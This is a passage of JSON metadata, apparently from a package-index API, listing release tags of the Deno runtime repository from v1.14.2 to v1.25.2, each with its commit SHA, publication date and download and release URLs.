2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/